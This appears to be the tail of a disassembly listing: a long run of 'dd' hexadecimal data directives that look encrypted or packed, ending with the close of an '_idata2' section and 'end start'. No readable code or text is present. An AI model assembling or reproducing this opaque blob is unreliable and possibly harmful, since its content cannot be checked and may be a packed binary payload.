7D2B7262h, 3E48E3F4h, 98FCB249h dd 3A2D5BACh, 59E656BDh, 25FEB344h, 0C103AAD0h, 0B4D3E9ECh dd 36277FCh, 0C1BFC6E3h, 15A6F60h, 2693BB4Ch, 0FC387F28h dd 851E278Eh, 0B757D45Ah, 0AAE7AA4h, 49F6A6ADh, 55EFA374h dd 0D138BB80h, 0A7E31185h, 199267CCh, 40B470E0h, 318AAB7Ah dd 0E570001Ah, 0ECD50709h, 0B50E37E5h, 0C19A2DE0h, 25127979h dd 0DD82252h, 0EE78D324h, 0A8884239h, 81CE0B9Ch, 628257CCh dd 219FE6C3h, 21F28F00h, 2172DB6Ch, 0AD63624Fh, 0A17E3384h dd 0FAFF5F10h, 98DCD38Ch, 29A28363h, 8243283Eh, 0C16EDE25h dd 
0AD6E3BCCh, 9FA33218h, 0F3E109Ch, 11DE94D5h, 4E9DAD9Ch dd 9CA9BD68h, 0CD479B92h, 0D591EA0Ah, 0E9069B6Ch, 72B7AD7Bh dd 33EB3B0h, 80CFE87Bh, 0DD966BC8h, 8FA27718h, 410E02ECh dd 49DE2F63h, 590D5E86h, 12140798h, 0EA1BE5EBh, 0BAAA3F04h dd 9C70EABh, 4902D728h dd 9C5AA3B4h, 24785F70h, 0CDC66FC5h, 28579092h, 25FEF370h dd 0C10ADFB0h, 99549E3Ah, 572DBACCh, 0C1A7E69Eh, 8C536F60h dd 2DA682C6h, 85B26CFEh, 355966A1h, 2E25BFF0h, 7841E15Ch dd 982A319h, 55EEE374h, 505C77E6h, 0A4F219D9h, 0C1228C9Eh dd 0D195F60Eh, 0D10A9F10h, 0D5A6017Fh, 5D13727Fh, 354E0394h dd 0C3EF2FE0h, 482CFDBCh, 39B2B371h, 0B99E7802h, 212D8AB5h dd 42398BDCh, 4C75FDA8h, 15EE5705h, 21FB8F40h, 0DB6D019h dd 0AD7B62B2h, 4ED43384h, 7232391Fh, 347361FCh, 4FE2F77Ch dd 0DF0F733Fh, 0B56B6A57h, 0AD663B8Ch, 0D6C7471Ah, 31EF16D3h dd 51EABF30h, 6743CB98h, 0C48D718h, 0D52E17DFh, 0D58AEA8Ah dd 0ED079B6Ch, 3FAAC168h, 658E5805h, 0F1FA173Bh, 0E9BDAEF6h dd 1E087748h, 75FAB2D1h, 491AAF60h, 0B368E8Ch, 0B39A8460h dd 85AA7941h, 0A1011930h, 8DFE605Dh, 6387DD20h, 3F2EA380h dd 954B8A37h, 0CD865BACh, 6C636728h, 9D989631h, 0D4002713h dd 9D16DF96h, 69519CAEh, 7F336ABEh, 0F6DA2F19h, 6DD28AC9h dd 5932C798h, 344166A4h, 0B771D487h, 0F7AE42A4h, 49F6BD8Dh dd 560A6374h, 55106A8Ah, 26201BECh, 0E0189AD1h, 24347344h dd 8403ADAh, 0F670AB3Ch, 0EC20AF38h, 0B50E37FDh, 0F01FD84Ah dd 0EEA63B38h, 36F38758h, 451E54E0h, 0F54D47B0h, 30FD2D57h dd 0C9C263D9h, 15AE92B5h, 0E00D8D40h, 4E06DB6Ch, 0FEEAE2CDh dd 0E50B4A0h, 0F18A5FA8h, 687D0D3Ch, 0A25AD14Eh, 0CDA5A571h dd 87D588C4h, 0CBA60867h, 0C837B0B3h, 5DED310h, 24EBBF70h dd 4CB33CDCh, 8942579Ch, 0A16623F4h, 6C022926h, 3C436C40h dd 5912E74Ch, 6A3CF384h, 5040DE45h, 1412809Ah, 51C47F7Dh dd 9EA88770h, 49AABC8Bh, 0B281026h, 0BB2F5F60h, 85AA7861h dd 0FA011930h, 973F3B5Fh, 7D33529Fh, 952EE3F4h, 810E8FC0h dd 48AC5C5Ch, 19925311h, 28E45385h, 712ED719h, 0A97F4EBEh dd 4DA23788h, 0F14AC317h, 0ABBBDF8Bh, 0CD19032Ah, 4D1B6292h dd 2E3813E4h, 0E55BBA07h, 0FD964B5Ch, 5AB69728h, 61DF2683h dd 613ACFC0h, 80323BACh, 0D991E00Fh, 
0E0CA7304h, 0DA600FE0h dd 0D6D1208Fh, 291B7505h, 3C8F28D4h, 992AD3A1h, 0D98FFE06h dd 0CE588718h, 52AE2E1h, 0D12AFFB0h, 0DB7A7FDCh, 0C3410750h dd 559A4AB1h, 47F06440h, 47E624D4h, 0D966CE1Dh, 52D555C4h dd 0B1BE6E95h, 1DD6683Ch, 0DE91C349h, 353AF211h, 815AEFA0h dd 5A6B4FECh, 0F9B244DFh, 0B5DBE724h, 0A20115E0h, 0F8BD0417h dd 89022E32h, 9DE7EBDFh, 16737CFCh, 4DF2AAA9h, 0D912A778h dd 0E8308684h, 0F17E3655h, 9D9EA1FCh, 9AA18E88h, 0F8CA0EACh dd 410A8B24h, 0DD2E1B4Dh, 0BF91AC53h, 5AFEB82h, 0A9CCD456h dd 859E0BD3h, 4B02D768h, 0CD858555h, 0D4B38A6Bh, 0FC3E3DEAh dd 0A97901F8h, 0A0731987h, 714AEBACh, 0A9676E4Bh, 0A9623788h dd 0F3FB5314h, 59224477h, 7E6DA2A7h, 52CAECB0h, 27D39874h dd 0D06A7FC9h, 0BD8FC989h, 82FB9628h, 0DCEA8730h, 212AA23Dh dd 0BFB90ACh, 0F29267C1h, 0A587F181h, 4F6850h, 1D16EB48h dd 1D22F788h, 1E96F4D6h, 979A2B22h, 431BF85Bh, 39F2C761h dd 44C7576Bh, 9CC2FFB0h, 0F6760BDCh, 8CCC05ADh, 3B9C5078h dd 21B6C304h, 788E4E93h, 1CDBE7F8h, 0A53E0A7Ah, 0CDD2D443h dd 6E29B33Fh, 1DA13C60h, 8AF83F7Ch, 27CF645Fh, 0F6667BF5h dd 70BE051Bh, 45E751A1h, 59A8BC70h, 44F04E15h, 0FAC917E8h dd 55DDDCDCh, 9BA4F00h, 0F2396DF9h, 60B41AF3h, 8D68F3C4h dd 4EB5E919h, 0E430BE77h, 0A3297748h, 3984805Ch, 0A899614Bh dd 0DAEF489h, 0B67207D9h, 0C59F0960h, 0BB1F7C30h, 3EF6CB65h dd 93BA5DDh, 7D124FB4h, 0A1D88ACFh, 8B0B5BECh, 6B574C3Ch dd 26FEF37Dh, 0F7E28F96h, 1EA9144Ah, 0E95B9175h, 0FEFB4314h dd 0ED6281Bh, 2DE7A0CFh, 403E2C98h, 0C567B531h, 0DCEF30F0h dd 0FEB64B1Dh, 49FBE5ADh, 6D6FC574h, 0E435EA7Fh, 8D461B50h dd 0F2906773h, 0DEE4747h, 0CE356919h, 64B01645h, 0EC2DF7C8h dd 0B54E0330h, 0F830AAE3h, 68A57B4Ch, 39B2BE2Ah, 235D3EFh dd 5CA8F0BCh, 86760BDCh, 4A8D5FAFh, 15AE63F0h, 22F84FC3h dd 0C805CF2Bh, 9912DECAh, 10816396h, 0F1CA66AEh, 289EFEC3h dd 0ACB8B708h, 0C28BCC54h, 685AEFA0h, 0AD663B50h, 7CBDB824h dd 5DE93B0h, 5EFF81F0h, 7D364019h, 88049CA8h, 855A60DFh dd 1E4F97E8h, 0AB7BA2D3h, 2C12E741h, 0CFBBF0F3h, 0B24A5FE9h dd 9DAF5979h, 2327FE08h, 0BECEC36Dh, 839F9460h, 1F26BBB5h dd 7FF73CD0h, 0B79E13DDh, 11AA4259h, 
0A84FB5Ch, 4902C880h dd 69606EB4h, 0A351CE4Bh, 0F69619EFh, 59EBADBDh, 0A6F2C644h dd 40F5CF54h, 8172AF33h, 6A79DCA9h, 0CC1CC69Bh, 8ABA6F60h dd 6DDFC9F9h, 8F442F98h, 2C3FEC5Bh, 516A3FF0h, 0BA9D4569h dd 32CBE524h, 0D7E1AB33h, 9EC530BCh, 3FC314E5h, 526DD806h dd 423F5738h, 31CABB61h, 22E95483h, 23A3CB63h, 0B54E63F0h dd 1A96100h, 6A827787h, 79CB29DDh, 70A75E64h, 922AFF94h dd 0FD4F7959h, 6C2731E8h, 1668487Ah, 63D19B02h, 0B6401D60h dd 0CBD32050h, 0A07E33C4h, 788A5F10h, 4389977Ah, 67573A8Bh dd 230E83ACh, 0B4267A5Fh, 55E53B8Ch, 423648E7h, 8CDE9324h dd 11D3EDF5h, 2B36A19Ch, 0BCF68257h, 15EB23B4h, 0E11ECB0Fh dd 0CDED9B2Ch, 5A78F728h, 0D3F99D4h, 714A1FD0h, 8103D4AAh dd 6AA2373Dh, 0B1C17CACh, 411AAA5Eh, 54707E05h, 34FF0798h dd 0C5DE6ABEh, 28C8EABDh, 6FA78B1Ch, 0B652D702h, 0D51B6721h dd 5E828CC0h, 0C88ADFE3h, 19B86738h, 1CA806BBh, 0E4F5DFD0h dd 9D16DE3Ch, 0A69DCF4Bh, 0F58AB690h, 6B5FE620h, 1EE6FB75h dd 28F1C451h, 813442F4h, 87DFC0A1h, 2B60B25h, 49F7F7BDh dd 5A2E2674h, 613E1E04h, 48F28ACh, 99AB497Dh, 0B4EF2204h dd 3ECA8038h, 0C8E9FB7Ch, 6962C228h, 3141C351h, 0C19A2B6Ah dd 0D4D4FE85h, 81318718h, 451EBAA9h, 6612B43Bh, 0FD423A59h dd 0C98257E8h, 16A81624h, 61EAE2C5h, 4ED4E86Ch, 6EA31079h dd 0DFFBBA25h, 498A1F29h, 1DD64F07h, 2ADEFCC3h, 351EAE11h dd 8288DCA0h, 5A97CC0Dh, 8F37CEF9h, 0C6DED31Dh, 57A1087Fh dd 0F0032865h, 3E4D0FFBh, 56D37B7h, 0C97B2449h, 37474B2Fh dd 377BD027h, 0E623877Dh, 0C34B13AAh, 0E1DDA01Ch, 0EAB63583h dd 71439316h, 98ED5028h, 0E81D3AAFh, 0B9323EB2h, 0E1CAD827h dd 9E6A4C20h, 3DF633DEh, 86891468h, 28A3E85Fh, 0A13A378Eh dd 0FE59D010h, 78EECBF1h, 5FC2B536h, 5126DDE7h, 0E90AD716h dd 0DD4C0B24h, 808E7FC9h, 8A138CC8h, 75A3864Dh, 7246C7DDh dd 0D71D4099h, 0E2EF30F0h, 7649B4E3h, 4095AA2Bh, 0D1E1E03Ah dd 9EC530A6h, 0D8054C91h, 0C21628B6h, 0D8418CFBh, 3F9DC07h dd 0A2062F73h, 391F0877h, 0BA015787h, 3E652A64h, 57D48F3h dd 0C60D7975h, 0BBE6576Bh, 4319004Fh, 0BD761D34h, 36EDBFE8h dd 15469CCBh, 7CFA8F40h, 628C36EDh, 0A4BBE7F8h, 0C17E33C7h dd 44016DEFh, 1D96524Eh, 4FC03E2Ch, 2F43FD15h, 
827C6AAFh dd 0F3ED3BCCh, 9F6C4424h, 408EA8A5h, 52FC3A7Fh, 3EC1CB9Ch dd 896217BEh, 0DCEB2CF4h, 17BA4F03h, 86C4C76Fh, 0DD1D8736h dd 653EF178h, 48CB1333h, 0DD962AFDh, 0EB4CF107h, 0F8268354h dd 4EE5509Eh, 6D24180Eh, 0A9388CD8h, 7D9219E7h, 11AB7F30h dd 0D718630Dh, 0DC322897h dd 956ED79Bh, 144A2F71h, 0CDC66FDCh, 0D02C4752h, 0CDEACB1Ch dd 8EF53544h, 9593939h, 9880E40Ah, 0B5BA7281h, 693F8420h dd 2DE6BB4Ah, 7934AFC1h, 6D0613A4h, 2E95D544h, 0C99FCE96h dd 8D449768h, 15DA8A5Eh, 48BF4780h, 6F465B98h, 0E817D018h dd 0EDBE3330h, 44CA9F50h, 76AB2B75h, 6822B7BCh, 30B9C6A0h dd 0C1DA1BD1h, 0ECA67B0Fh, 84729C2Ch, 455EE74Dh, 119A8BB5h dd 0FD422161h, 6EF652E8h, 2185DEB4h, 55FF8F00h, 7C832CF2h dd 9952A78Ch, 0D1FE33C4h, 0D837DF19h, 1FD62B08h, 8C613E3Fh dd 754EFA3Ah, 75D507A0h, 6D8EC433h, 114DB8E5h, 5DE9101h dd 689C22FBh, 0A3DECBDCh, 86BDE854h, 0D56C2870h, 930FC400h dd 86C6DB15h, 87119B26h, 9AC32C6Ch, 44C8102Fh, 5C962BFDh dd 0E9C25342h, 0CB456354h, 3B19F932h, 7D5CF898h, 8D43822Fh dd 0C59E53A4h, 1FDF6F30h, 9CA3ED1h, 0C489D728h, 956EF3D9h dd 182DAB33h, 0CD8652E3h, 9D2D2B5h, 800DB304h, 73E9DF21h dd 18A14F4Fh, 0A92203F9h, 0E58E4314h, 172EB2Fh, 5E19BB4Ch dd 885D2FB0h, 10D5EC5Bh, 0D12A0656h, 79B99999h, 9C297BAh dd 6C9C16FFh, 2BB1CFC0h, 0A90C9ABCh, 39922798h, 96B6392Fh dd 3203AC52h, 0D02DBF0Eh, 6962E7E5h, 0A5238E5Fh, 97E82FA0h dd 6E824787h, 79E2EAFDh, 0E29DD364h, 912AFFDDh, 0B50C80DCh dd 0CA8A1DE9h, 9E59E4C3h, 61C309C5h, 7C832C6Ch, 0D952A78Ch dd 0D17E33C4h, 0F292A812h, 2DFF674Eh, 104C02C1h, 685C3D4h dd 766AEE88h, 0ED520A49h, 0F9B20718h, 0F2DCE724h, 0E502EE68h dd 24C93460h, 0FA411B43h, 0D91C08DCh, 45491951h, 0B84BC273h dd 59529344h, 3B615777h, 3CD82EDFh, 0DD97F97Bh, 0C6374D08h dd 40CEC360h, 39C8C666h, 0E534CFDAh, 759AF888h, 9F61AC3Bh dd 12A635BBh, 0B8019B16h, 4942E359h, 852EE3B4h, 0D47C4E4Dh dd 630BD2FFh, 1AD22701h, 65EEDEC1h, 1CAD5C90h, 9D56EBBCh dd 564A74E3h, 0B5B73DA1h, 535DE620h, 0A2E6BB4Ch, 0FCC5E7DEh dd 851E2795h, 516A3FF0h, 15E44C68h, 0F63D6E0Fh, 0FB63282Eh dd 823A8FB9h, 0A50D92AFh, 
52826D73h, 0A5870581h, 3980A650h dd 179FA80Fh, 7960F680h, 0B5166057h, 0F8E0AA6Bh, 0D1CE7B4Ch dd 38F2877Ch, 4447DB26h, 4A0AFF3h, 0BD363FF3h, 0FDB3D21Fh dd 15AE6374h, 278E9F40h, 5D6B566Fh, 99E4E7F8h, 914FB633h dd 0F18A5F50h, 9A36B3Eh, 0AC1571B6h, 754EF7A5h, 815EEFA0h dd 18EC3DB9h, 0F9F27328h, 31EF16D3h, 11EABF30h, 7643CB9Ch dd 4B401022h, 37B8215Eh, 6BB3A4F7h, 0A704A92Bh, 0AEF0717Ah dd 0EE5A21B7h, 0B3C57BF2h, 8B2BA8A4h, 0E9A23731h, 0CE46075Bh dd 0F4E5509Fh, 6D66C2FEh, 8CB69227h, 706153A4h, 11EA465Eh dd 8CA1EA3h, 0C48FD728h, 956EDAEEh, 98189A4Dh, 9FD75BACh dd 0AC2D6752h, 25BE8A12h, 44B24A6Fh, 28A9EBFCh, 0A9220E9Eh dd 0C0B2D6EBh, 0B4576F60h, 2DA68302h, 40607267h, 7A0813E4h dd 915F8B65h, 0AB13C81Ch, 9C2D711h, 55EE4BB7h, 0B67CF80h dd 0C4AB9AADh, 819267CBh, 607F7CF4h, 318A8AD0h, 0DED56BF9h dd 66D20840h, 0A0CE8615h, 0FC592FA0h, 0ED8C7B1Ch, 0B8949B2Dh dd 2912F718h, 0F1398AC1h, 4289CF34h, 21872217h, 0EA51984Ah dd 0DE055DA8h, 0B228BA93h, 0AD049F95h, 0A55B8BD6h, 19EA5F10h dd 0E2299499h, 6D698E3Dh, 0C083F3B0h, 811AD7EEh, 0CB6E6B47h dd 0FBB47D99h, 6D88B657h, 5115BF70h, 7D5C0F17h, 1CBD47FAh dd 0D52E160Ch, 60B28B83h, 32F9C712h, 0DA11D224h, 4ED6F742h dd 59B5E02Bh, 2269D483h, 9D1AB469h, 0DECE8354h, 413517D1h dd 7DCEFB8Ch, 7B7207D8h, 0F52653C4h, 0F9AA7F30h, 3DF68B5Fh dd 0C402F3AAh, 5822C7E0h, 0A1828CEEh, 25E64290h, 19D26738h dd 15DAE7CFh, 0F01054CDh, 0DD62F851h, 4C5BDFC8h, 37EFBCEBh dd 6D96F24h, 2CE4BE4Ah, 0FAD9168Ah, 7ED7175h, 13120266h dd 82h, 4Bh dup(0) dd 1600h dup(?) _idata2 ends end start